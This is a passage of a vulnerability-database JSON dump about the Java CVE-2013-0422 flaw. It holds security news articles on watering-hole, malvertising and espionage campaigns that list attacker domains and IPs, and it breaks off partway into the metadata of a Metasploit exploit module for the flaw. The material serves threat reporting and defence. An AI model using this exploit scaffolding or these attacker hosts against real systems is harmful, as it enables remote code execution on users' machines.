world, you need to look at the patch with special detail, because sometimes the vendor stops the worm/0day exploit with a patch, but doesn\u2019t necessary fix all of the associated problems,\u201d Guillardoy wrote. \u201cAnd of course, being only human, sometimes the vendor\u2019s team just plain messes up the patch.\u201d\n\nOracle released Java 1.7u11 on Sunday, four days after exploits were discovered in the wild. The update not only said it addressed vulnerabilities being exploited, but also chanced the default Java security level from medium to high. As a result, any unsigned or self-signed Java applications would no longer run by default and would require a user to approve execution of the applet.\n\nSecurity experts said it was a good first step, but an attacker could still use social engineering to trick a user into executing a malicious Java applet. Attackers could also steal valid digital certificates and sign malicious applets so that they would run without intervention.\n\nWhile these [Java exploits](<https://www.securelist.com/en/blog/208193822/The_Current_Web_Delivered_Java_0day>) were targeting Windows machine, Java\u2019s ubiquity on all platforms makes it an attractive target for attackers.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere,\u201d said Jaime Blasco, manager of AlienVault Labs. \u201cYou will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n\n_This article was updated on Jan. 17 to clarify that CVE-2012-0422 covers both Java vulnerabilities. _\n", "modified": "2013-05-10T14:16:59", "published": "2013-01-17T15:34:07", "id": "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "href": "https://threatpost.com/java-7u11-update-addresses-only-one-two-zero-day-vulnerabilities-011713/77417/", "type": "threatpost", "title": "Java 7u11 Update Addresses Only One of Two Zero-Day Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2012-4681", "CVE-2013-0422"], "description": "A malvertising campaign that\u2019s lasted almost half a year is staying alive thanks to infected web advertisements being circulated by otherwise clean ad networks.\n\nThe campaign, now in its fifth month, relies on the Dynamic Domain Name System (DDNS) to keep it from being caught according to a report from Symantec\u2019s [Security Response blog](<https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/>) that likens its relationship to a \u201cnever-ending story.\u201d\n\nAttackers have been leveraging the ads by inserting their own obfuscated JavaScript into ad network ads. The JavaScript helps attackers gauge whether or not victims are running older versions of Internet Explorer and from there, installs tracking cookies and redirects users to a sketchy domain of their choosing.\n\nThe domains change often \u2013 Symantec notes it\u2019s seen the campaign filter users through more than 50 different URLs since its inception in October 2012.\n\nOnce guided to the site, the campaign recognizes the user\u2019s build of Java so multiple JAR files can be dropped onto the system.\n\nThe JAR files target a handful of IE-related Java vulnerabilities ([CVE-2012-4681](<https://threatpost.com/oracle-releases-fix-java-cve-2012-4681-flaw-083012/>) and [CVE-2013-0422](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)) and builds a dynamic-link library (DLL) which then allows attackers to download malware to the machine.\n\nAccording to Cisco\u2019s 2013 Annual Security Report [issued last month](<https://threatpost.com/report-mainstream-websites-host-majority-malware-013113/>), malvertising, the delivery of malware via online ads, \u201cplayed a more significant role in web malware encounters in 2012 than in 2011,\u201d with about 83 percent of malware on the web coming from malicious iframes and scripts last year.\n", "modified": "2013-04-17T16:30:45", "published": "2013-02-11T20:40:31", "id": "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "href": "https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/77514/", "type": "threatpost", "title": "Report: Malvertising Campaign Thrives on Dynamic DNS", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:31", "bulletinFamily": "info", "cvelist": ["CVE-2011-3544", "CVE-2012-4792", "CVE-2013-0422"], "description": "[](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)The [Java saga](<https://threatpost.com/its-time-abandon-java-012113/>) continued when unknown, and apparently well concealed goons exploited recent Java and Internet Explorer zero-days to compromise the website of the French-based, free-press advocacy group, Reporters Without Borders. The attack, which attempted to take advantage of the time-gulf that separates Oracle\u2019s patch release from their users\u2019 application of it, is part of a [watering hole campaign](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) also targeting [Tibetan](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>) and Uygur human rights groups as well as Hong Kong and Taiwanese political parties and other non-governmental organizations.\n\n[Writing on the Avast Security blog](<https://blog.avast.com/2013/01/22/reporters-without-borders-website-misused-in-wateringhole-attack/>), Jindrich Kubec claims it is safe to assume that China is behind these attacks. Kubec\u2019s assertion appears to be based, at least in part, on the reality that visitors to the [watering hole](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) sites (and the sites themselves for that matter), are, for lack of a better way to put it, individuals, organizations, and political entities that the People\u2019s Republic publically does not like.\n\nThe watering hole attack is a social engineering technique whereby attackers attempt to compromise websites that are not directly or officially related to their intended targets but which they believe members of an intended target organization are likely to visit.\n\nAccording to the Avast report, the attackers used the recent Internet Explorer and Java vulnerabilities, identified as CVE-2012-4792 and CVE-2013-0422 respectively. Microsoft resolved the IE bug with [MS13-008](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>) and Oracle fixed theirs with [Java 7 update 11](<https://threatpost.com/newest-java-7-update-still-exploitable-researcher-says-090412/>).\n\nIn the end, if the exploits succeed they will infect victim machines with either a [remote access trojan](<https://threatpost.com/fakem-rat-mimics-normal-network-traffic-011813/>) that phones home to the Singapore-based \u201cluckmevnc.myvnc.com\u201d (IP address 112.140.186.252) or an injector that flashes a fake error page while downloading a similar remote access tool that communicates with the Hong Kong-based \u201cd.wt.ikwb.com\u201d (58.64.179.139).\n\nAn English version of the Reporters Without Borders site contained a suspicious jacvascript inclusion. That inclusion creates a cookie called \u201csomethingbbbbb\u201d designed to expire after one day. The same cookie was used in similar attacks a few years ago and Kubec believes it could be related to the legitimate m.js cookie, \u201csomethingeeee,\u201d used by a Honk Kong political party.\n\nKubec also determined that an iframe from hxxp://newsite.acmetoy.com/m/d/pdf.html targeted users visiting the site in IE 8. There were an additional two iframes, hxxp://newsite.acmetoy.com/m/d/pdf.html and hxxp://newsite.acmetoy.com/m/d/javapdf.html reserved for those that visited the site on a browser other than IE.\n\nAccording to Kubec\u2019s analysis of newsite.acmetoy.com, a number of files relating to the IE exploit listed above, including a DOITYOUR obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability as well as DOITYOUR variants of \u201ctoday.swf,\u201d \u201cnews.html,\u201d and \u201crobots.txt.\u201d\n\nThe site also attempted to exploit at least one other Java vulnerability from back in 2011 as well (CVE-2011-3544) and contained the related files, \u201cjavapdf.html,\u201d a javascript file for both vulnerabilities, \u201cAppletHigh.jar,\u201d a CVE-2013-0422 exploit, and \u201cAppletLow.jar,\u201d a CVE-2011-3544 exploit.\n\nIn an analysis of other site (98.129.194.210), Kubec found that it contained the same malicious Java-related content and reasons that it probably serves as a backup to the first in the event of a takedown.\n\nAvast said it notified Reporters Without Borders.\n", "modified": "2013-05-13T18:47:05", "published": "2013-01-23T18:53:02", "id": "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "href": "https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/77443/", "type": "threatpost", "title": "Attackers Exploit Java, Compromise Reporters Without Borders Site", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. _** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. The javascript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote. \u201c\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. The malware makes an outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with the cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains downloading Amsecure malware, which is part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "modified": "2013-06-12T16:59:18", "published": "2013-06-10T16:17:14", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:09", "bulletinFamily": "info", "cvelist": ["CVE-2012-4792", "CVE-2013-0422", "CVE-2013-0640"], "description": "Researchers at Kaspersky Lab and CrySys Lab have discovered files buried inside a MiniDuke command and control server that indicate the presence of a Web-based facet of the campaign that initially targeted government agencies, primarily in Europe.\n\nUsers are likely lured to the malicious webpages via spear phishing messages containing a link to the attack site. The site, which remains active, is serving exploits for patched vulnerabilities in Java and Internet Explorer, researcher Igor Soumenkov wrote on the [Securelist](<http://www.securelist.com/en/blog/208194159/Miniduke_web_based_infection_vector>) blog today.\n\nSoumenkov said the attack site hosts a pair of frames, one that loads a webpage from a legitimate organization involved in the rebuilding and modernization of Iraq. In addition to the decoy page, a malicious page acts as a \u201cprimitive exploit pack,\u201d Soumenkov said, determining the browser used to visit the attack site and then serves the appropriate exploit. Data collected is also sent to the attacker\u2019s server.[](<https://threatpost.com/new-web-based-miniduke-components-discovered-031113/>)\n\n\u201cThe exploits are located in separate webpages,\u201d Soumenkov wrote. \u201cClients using Internet Explorer version 8 are served with about.htm, for other versions of the browser and for any other browser capable of running Java applets, the javascript code loads JavaApplet.html.\u201d\n\nThe Java file loads a Java class file that exploits [CVE-2013-0422](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>), a vulnerability affecting Java 7u10 and older that bypasses the built-in sandbox in Java to allow remote code execution. Soumenkov said the exploit is coded slightly differently than others exploiting this vulnerability, including the Metasploit module, likely to avoid detection by security software. Oracle patched this vulnerability on Jan. 13; the applet was uploaded on Feb. 11, Soumenkov said.\n\nOnce the Java shellcode is executed, it launches an encrypted DLL and writes it to a temporary Java directory with the name ntuser.bin. It then copies the rundll.32.exe system file to the same directory along with another executable that loads the main module of Miniduke.\n\nMiniduke then reaches out to a pre-seeded Twitter post hosting a URL connecting it to the command and control server to download further instructions.\n\nThe IE 8 exploit behaves similarly, but exploits [CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>), which was [patched in December by Microsoft](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>). A Metasploit module was released Dec. 29 and the [Microsoft Security Update MS13-008](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) on Jan. 14. Like its Java counterpart, this exploit page was uploaded Feb. 11.\n\nThe shellcode used in the IE attack downloads a GIF image from the command and control server then decrypts the portable executable file hidden in the image.\n\n\u201cThe PE file also appeared to be a modification of the Miniduke\u2019s main backdoor module that uses the same Twitter URL as the Java payload,\u201d Sumenkov wrote.\n\nMiniDuke surfaced on Feb. 27 and originally were thought to be just a phishing campaign where targets were emailed malicious PDF files pretending to be Ukraine\u2019s foreign policy and NATO membership plans, as well as information for a phony human rights seminar. The PDF attacks targeted CVE-2013-0640, an Adobe Reader vulnerability that had been patched a week earlier. Attackers were able to cope and move files, create new directories, kill processes and install additional malware. MiniDuke was the second successful Reader sandbox bypass.\n\nMiniDuke stood out for researchers for its use of steganography to hide custom backdoor code, as well as using Twitter to reach URLs pointing to command and control servers. Another unique feature of MiniDuke was its use of a small downloader written in an old-school Assembler language used to gather system information unique to the compromised machine.\n\n\u201cThis is a unique and very strange attack. The many different targets hit in separate countries, together with the high profile appearance of the decoy documents and the weird backdoor functionality indicate an unusual threat actor,\u201d said the original Kaspersky and CrySyS report. \u201cSome of the elements remind us of both Duqu and Red October, such as the minimalistic approach, hacked servers, encrypted channels but also the typology of the victims.\u201d\n", "modified": "2013-05-08T14:19:31", "published": "2013-03-11T16:29:10", "id": "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "href": "https://threatpost.com/new-web-based-miniduke-components-discovered-031113/77610/", "type": "threatpost", "title": "New Web-Based MiniDuke Components Discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said [Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three media other sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.\n", "modified": "2013-05-09T20:01:56", "published": "2013-05-07T12:58:12", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2012-1723", "CVE-2012-1856", "CVE-2013-0422"], "description": "An espionage campaign featuring precise targeting of victims and malware that allows the attackers one-on-one interaction with compromised systems has been uncovered. Government agencies, manufacturers, high tech companies and media organizations in South Korea and Japan have been the primary targets of the campaign called Icefog, which was reported today by researchers at Kaspersky Lab.\n\nThe China-based campaign is two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.\n\n\n\nHowever, while other APT campaigns maintain a long-term persistence inside infected networks, Icefog seems to do just the opposite. The attackers, Kaspersky researchers said, know what they need from a victim and once they have it, the target is abandoned. They\u2019re also likely a small group of hired guns, akin to mercenaries, used to attack a particular group, steal data, and get out quickly.\n\n\u201cWe\u2019ve entered the era of a growing number of these smaller, agile groups hired on a per-project basis,\u201d said Kaspersky Lab researcher Kurt Baumgartner, speaking today at the Billington Cybersecurity Summit in Washington, D.C. \u201cThe operational improvements have arrived and these polished APT groups become much better at flying under the radar.\n\n\u201cFinding a pattern in all the noise is not easy. It\u2019s becoming harder and harder to identify the patterns and connect them with a group,\u201d Baumgartner said.\n\nTo date, Kaspersky Lab\u2019s Global Research and Analysis Team has observed six variants of Icefog and has been able to sinkhole 13 domains used in the attack, capturing snapshots of the malware used and logs detailing victims and interaction with command and control servers.\n\nWindows and Mac OS X versions of Icefog have also been observed, but it appears the OS X backdoor is merely a beta trial of the malware, largely found in online Chinese bulletin boards. Meanwhile, more than 200 unique Windows-based IP addresses have connected to a Kaspersky-controlled sinkhole, a fraction of the total infections researchers said.\n\n\u201cThere\u2019s a team of operators that are being very selective and going after exactly what they need,\u201d said Baumgartner, right. \u201cIt\u2019s classic APT behavior. They likely have previous knowledge of the networks and targets.\u201d\n\nThose targets include defense industry contractors such as Lig Nex1 and Selectron Industrial Company, shipbuilding companies DSME Tech, Hanjin Heavy Industries, telecom operators such as Korea Telecom and media companies such as Fuji TV.\n\nIcefog not only establishes a backdoor connection to the attacker-controlled command infrastructure, but it also drops a number of tools that allow the attackers to steal certain document types and pivot within an infected company looking for more computers to infect and additional resources to steal.\n\nThe campaign also relies on exploits for vulnerabilities that have been patched in Windows or Java to establish a foothold on an endpoint. Remote code execution bugs in Windows (CVE-2012-0158 and CVE-2012-1856) spread via malicious Word or Excel files are the most common means of initiating the Icefog attack. The infected attachments promise anything from an illicit image of a woman to a document written in Japanese titled: \u201cLittle enthusiasm for regional sovereignty reform.\u201d Users are also sent links to compromised sites hosting Java exploits (CVE-2013-0422 and CVE-2012-1723).\n\nSeparate spear phishing campaigns were also spotted using HLP files\u2014older versions of Winhelp files\u2014to infect targets. Winhelp was supported natively until Windows Vista was released.\n\n\u201cMost likely, the choice to abuse Winhelp indicates that the attackers have an idea of what version operating systems they are attacking,\u201d the Kaspersky report said.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/22105452/icefog.pdf>)\n\nAnother spear phishing effort used HWP document files to spread Icefog; HWP is a proprietary document format used in South Korea, in particular by the government.\n\nOnce a machine is compromised, the attackers individually analyze system information and files stored on the machine and if it passes muster, the backdoor and lateral movement tools are remotely sent to the machine, including password and hash-dumping tools for saved Internet Explorer and Outlook passwords. A compression program is also sent down to compress stolen data before it\u2019s sent to the command and control server. Beyond credentials, victims are losing Windows address book files (.WAB), as well as HWP, Excel and Word files.\n\nOf the six variants, the oldest in 2011 was used in an attack against Japan\u2019s House of Representatives and House of Councilors. Six AOL email addresses were used and commands were also fetched from these accounts.\n\nThe most commonly seen Icefog variant is called Type 1 and it has all the backdoor and lateral movement capabilities described earlier, as well as giving the attackers access to execute SQL commands on SQL Servers found on the network. It\u2019s here where the term Icefog was seen in a string used in the command and control server (the C&C software is named Dagger Three). The command and control script, meanwhile, provides a professional looking interface used to communicate and interact with compromised machines. It uses the native file system to store stolen data and temporary files.\n\n\u201cPerhaps the most interesting part is that the Type 1 C&C panel maintains a full history of the attacker\u2019s interaction with the victims,\u201d the report said. \u201cThis is kept as an encrypted logfile, in the \u2018logs\u2019 directory on the server. In addition to that, the server maintains full interaction logs and command execution results from each victim.\u201d\n\nAnother variant was used to enhance Type 1 infections with additional encryption obfuscating communication with command servers. It was not used against victims and disappeared once a machine was rebooted.\n\nSamples for two other variants have yet to be obtained, but Kaspersky was able to sinkhole three domains used with these attacks. These two variants had only view and update capabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/07040656/ips_icefog.jpg>)\n\nThe most recent version, Icefog-NG, doesn\u2019t communicate with a central command server and instead of using a webserver, its command and control is a Windows desktop application that works as a standalone TCP server listening on port 5600.\n\nKaspersky said it first obtained an Icefog sample in June after an attack on Fuji TV. It was able to connect the dots back to the attack on the Japanese parliament two years ago.\n\n\u201cWe predict the number of small, focused APT-for-hire groups to grow, specializing in hit-and-run operations, a kind of \u2018cyber-mercenaries\u2019 of the modern world,\u201d the report said.\n", "modified": "2018-03-22T14:54:55", "published": "2013-09-25T16:30:30", "id": "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "href": "https://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417/", "type": "threatpost", "title": "Icefog Targeted APT Attacks Hit South Korea, Japan", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0422"], "description": "Applet can grant permissions to itself.", "edition": 1, "modified": "2013-01-21T00:00:00", "published": "2013-01-21T00:00:00", "id": "SECURITYVULNS:VULN:12827", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12827", "title": "0-day vulnerability in Oracle Java is used to install maliscious software", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2013-0422"], "description": "\r\n\r\nHello All,\r\n\r\nThis post might be interesting for those concerned about the\r\nstate of Oracle's Java SE security.\r\n\r\nWe have successfully confirmed that a complete Java security\r\nsandbox bypass can be still gained under the recent version\r\nof Java 7 Update 11 [1] (JRE version 1.7.0_11-b21).\r\n\r\nMBeanInstantiator bug (or rather a lack of a fix for it [2][3])\r\nturned out to be quite inspirational for us. However, instead\r\nof relying on this particular bug, we have decided to dig our\r\nown issues. As a result, two new security vulnerabilities (51\r\nand 52) were spotted in a recent version of Java SE 7 code and\r\nthey were reported to Oracle today [4] (along with a working\r\nProof of Concept code).\r\n\r\nThank you.\r\n\r\nBest Regards\r\nAdam Gowdiak\r\n\r\n---------------------------------------------\r\nSecurity Explorations\r\nhttp://www.security-explorations.com\r\n"We bring security research to the new level"\r\n---------------------------------------------\r\n\r\nReferences:\r\nReferences:\r\n[1] Oracle Security Alert for CVE-2013-0422\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\r\n[2] Java 7 Update 11 Addresses the Flaw Partly Fixed in October 2012, Experts Say\r\n\r\nhttp://news.softpedia.com/news/Java-7-Update-11-Addresses-the-Flaw-Partly-Fixed-in-October-2012-Experts-Say-320792.shtml\r\n[3] Confirmed: Java only fixed one of the two bugs\r\n\r\nhttp://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html\r\n[4] SE-2012-01 Vendors status\r\n http://www.security-explorations.com/en/SE-2012-01-status.html\r\n\r\n", "edition": 1, "modified": "2013-01-21T00:00:00", "published": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28971", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28971", "title": "[SE-2012-01] Java 7 Update 11 confirmed to be vulnerable", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T22:23:33", "description": "Java Applet JMX Remote Code Execution. CVE-2013-0422. Remote exploit for java platform", "published": "2013-01-11T00:00:00", "type": "exploitdb", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-11T00:00:00", "id": "EDB-ID:24045", "href": "https://www.exploit-db.com/exploits/24045/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({ :javascript => false })\r\n\r\n\tdef initialize( info = {} )\r\n\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java Applet JMX Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module abuses the JMX classes from a Java Applet to run arbitrary Java\r\n\t\t\t\tcode outside of the sandbox as exploited in the wild in January of 2013. The\r\n\t\t\t\tvulnerability affects Java version 7u10 and earlier.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'egypt', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2013-0422' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '625617' ],\r\n\t\t\t\t\t[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\r\n\t\t\t\t\t[ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? I can't read Russian :-(\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['java'],\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Mac OS X x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 10 